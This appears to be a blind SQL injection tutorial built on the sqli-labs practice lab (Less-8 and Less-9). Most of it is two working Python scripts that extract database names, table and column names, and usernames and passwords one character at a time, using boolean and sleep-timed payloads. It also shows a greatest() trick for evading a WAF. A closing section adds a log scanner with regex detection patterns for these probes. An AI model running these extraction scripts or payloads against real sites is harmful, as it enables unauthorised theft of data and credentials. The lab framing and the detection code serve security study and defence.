Contents
1. Basics
Database: information_schema holds all of the database server's metadata
2. Boolean-based and time-based blind injection
(1) Boolean-based blind injection example (sqli-labs Less-8):
(2) Time-based blind injection example (sqli-labs Less-9):
1. Basics
Database: information_schema holds all of the database server's metadata
use information_schema;
The schemata table records every database (schema_name is the database name)
select schema_name from schemata;
The tables table records every table (key columns: table_schema, the database the table belongs to; table_name, the table's name)
select table_name from tables where table_schema = "security";  -- list all tables of the "security" database
The columns table records every column (table_schema, the owning database; table_name, the table's name; column_name, the column's name)
select column_name from columns where table_schema="security" and table_name="users";  -- list all column names of table "users" in database "security"
2. Boolean-based and time-based blind injection
Characteristics:
1. The two kinds of blind injection are essentially the same: in both, the page gives no echo (neither error messages nor query results are displayed).
2. With boolean-based blind injection, the page returned when the SQL condition is true differs from the one returned when it is false, so the response page itself tells you the result. With time-based blind injection the page looks the same whether the condition is true or false, yet the injection does exist; in that case use if(condition, sleep(3), 1) and judge by whether the response is delayed by three seconds.
(1) Boolean-based blind injection example (sqli-labs Less-8):
As you can see, when the SQL query returns a row the page shows "You are in...........", and when it returns nothing the message is absent. Here you can use sqlmap to perform the blind injection, or write a script that iterates over the characters of the values you need.
Python script:
import requests

# URL = "http://localhost/Less-8/"
# payload = {"id": "1' and ascii(substr(database(),1,1))=115 -- "}
# res = requests.get(url=URL, params=payload)
# if "You are in" in res.text:
#     print("yes")
# else:
#     print("no")


def get_database(URL):
    # Fetch the database name one character at a time, binary-searching the ASCII range 32..128
    s = ""
    for i in range(1, 10):
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            # greatest(c, mid) = mid is true exactly when the i-th character c <= mid
            payload = {"id": f"1' and greatest(ascii(substr(database(),{i},1)),{mid})={mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                high = mid
            else:
                low = mid + 1
            mid = (low + high) // 2
        s += chr(mid)
    print("Database name: " + s)


def get_table(URL):
    # Fetch the table names (group_concat joins them into one string)
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            payload = {"id": f"1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        s += chr(mid)
    print("Table names: " + s)


def get_column(URL):
    # Fetch the column names of the users table
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            payload = {"id": f"1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        s += chr(mid)
    print("Column names: " + s)


def get_result(URL):
    # Fetch the username and password data (0x3e is '>' used as a separator)
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            payload = {"id": f"1' and ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        s += chr(mid)
    print("Username and password data: " + s)


if __name__ == '__main__':
    URL = "http://localhost/Less-8/"
    # get_database(URL)
    # get_table(URL)
    # get_column(URL)
    get_result(URL)
Execution result:
Here I only iterated over 32 characters; increase the range if needed.
(2) Time-based blind injection example (sqli-labs Less-9):
PHP code:
As you can see, whether the SQL is correct or not, and whether a row is found or not, the page shown is always the same; time-based blind injection is still possible, though, which you can test with if(1=1,sleep(3),1).
The browser's loading spinner then runs for three seconds, which shows that time-based blind injection is present. The Python script approach is roughly the same as for boolean-based blind injection: put the SQL condition in the position of 1=1 inside if(), then judge by the time elapsed between sending the request and receiving the page.
Python script:
import requests
import datetime

# URL = "http://localhost/Less-8/"
# payload = {"id": "1' and ascii(substr(database(),1,1))=115 -- "}
# res = requests.get(url=URL, params=payload)
# if "You are in" in res.text:
#     print("yes")
# else:
#     print("no")


def timed_request(URL, payload):
    # Send one request and return how many seconds the server took to answer
    start = datetime.datetime.now()
    requests.get(url=URL, params=payload)
    end = datetime.datetime.now()
    return (end - start).total_seconds()


def get_database(URL):
    # Fetch the database name one character at a time, binary-searching the ASCII range 32..128
    s = ""
    for i in range(1, 10):
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            # greatest(c, mid) = mid is true exactly when the i-th character c <= mid
            payload = {"id": f"1' and if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(3),1) -- "}
            if timed_request(URL, payload) >= 3:
                high = mid
            else:
                low = mid + 1
            mid = (low + high) // 2
        s += chr(mid)
    print("Database name: " + s)


def get_table(URL):
    # Fetch the table names
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            payload = {"id": f"1' and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(3),1) -- "}
            if timed_request(URL, payload) >= 3:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        s += chr(mid)
    print("Table names: " + s)


def get_column(URL):
    # Fetch the column names of the users table
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            payload = {"id": f"1' and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(3),1) -- "}
            if timed_request(URL, payload) >= 3:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        s += chr(mid)
    print("Column names: " + s)


def get_result(URL):
    # Fetch the username and password data
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while high > low:
            payload = {"id": f"1' and if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(3),1) -- "}
            if timed_request(URL, payload) >= 3:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        s += chr(mid)
    print("Username and password data: " + s)


if __name__ == '__main__':
    URL = "http://localhost/Less-9/"
    get_database(URL)
    # get_table(URL)
    # get_column(URL)
    # get_result(URL)
Result:
In the first function of both Python scripts above (the one that fetches the database name), the injected SQL uses the greatest() function, which can be used to get past a WAF that filters out < and >.
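A defender-side complement to the boolean and time-based scripts above and to the greatest() note, as an added example that is not part of the original post: it scans constructed Apache-style access-log lines for the ascii(substr(...)), greatest(), information_schema and sleep() fragments those scripts send, including the greatest() form that a filter on < and > alone would miss, and counts flagged probes per client so the character-by-character binary search stands out. The log lines, client addresses and regexes are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Signatures modelled on the payload shapes the page's scripts send: ascii(substr(...)) character
# probes, the greatest() comparison that avoids < and >, information_schema enumeration, sleep() timing.
PATTERNS = {
    "char_probe": re.compile(r"ascii\s*\(\s*substr", re.I),
    "greatest_cmp": re.compile(r"greatest\s*\(", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns|schemata)", re.I),
    "time_probe": re.compile(r"\bsleep\s*\(\s*\d+", re.I),
}

# Apache combined-format access log line; only the client IP and the request target are needed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines (hypothetical, not from the page); lines 2-5 mimic the scripts' probes.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2024:12:00:01 +0000] "GET /Less-8/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/May/2024:12:00:02 +0000] "GET /Less-8/?id=1%27+and+greatest%28ascii%28substr%28database%28%29%2C1%2C1%29%29%2C80%29%3D80+--+ HTTP/1.1" 200 480 "-" "python-requests/2.31"
10.0.0.7 - - [10/May/2024:12:00:02 +0000] "GET /Less-8/?id=1%27+and+greatest%28ascii%28substr%28database%28%29%2C1%2C1%29%29%2C104%29%3D104+--+ HTTP/1.1" 200 480 "-" "python-requests/2.31"
10.0.0.7 - - [10/May/2024:12:00:03 +0000] "GET /Less-8/?id=1%27+and+ascii%28substr%28%28select+group_concat%28table_name%29+from+information_schema.tables+where+table_schema%3D%22security%22%29%2C1%2C1%29%29%3E80+--+ HTTP/1.1" 200 480 "-" "python-requests/2.31"
10.0.0.9 - - [10/May/2024:12:00:09 +0000] "GET /Less-9/?id=1%27+and+if%28%28ascii%28substr%28database%28%29%2C1%2C1%29%29%3E80%29%2Csleep%283%29%2C1%29+--+ HTTP/1.1" 200 480 "-" "python-requests/2.31"
"""

def classify_request(target):
    """Return the signature names found in the URL-decoded query string of one request target."""
    decoded = unquote_plus(urlsplit(target).query)
    return {name for name, rx in PATTERNS.items() if rx.search(decoded)}

def scan_log(text):
    """Return (client_ip, path, signatures) for each request that matches at least one signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (sigs := classify_request(m["target"])):
            hits.append((m["ip"], urlsplit(m["target"]).path, sigs))
    return hits

def probe_counts(hits):
    """Flagged requests per (client, path). A binary search over ASCII 32..128 costs about seven
    requests per extracted character, so a real extraction shows as hundreds of hits from one client."""
    return Counter((ip, path) for ip, path, _ in hits)

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, path, sigs in found:
        print(ip, path, sorted(sigs))
    print(probe_counts(found).most_common())
```

A single unquote_plus pass is enough for the encoding python-requests produces; double-encoded input would need a second decode before matching.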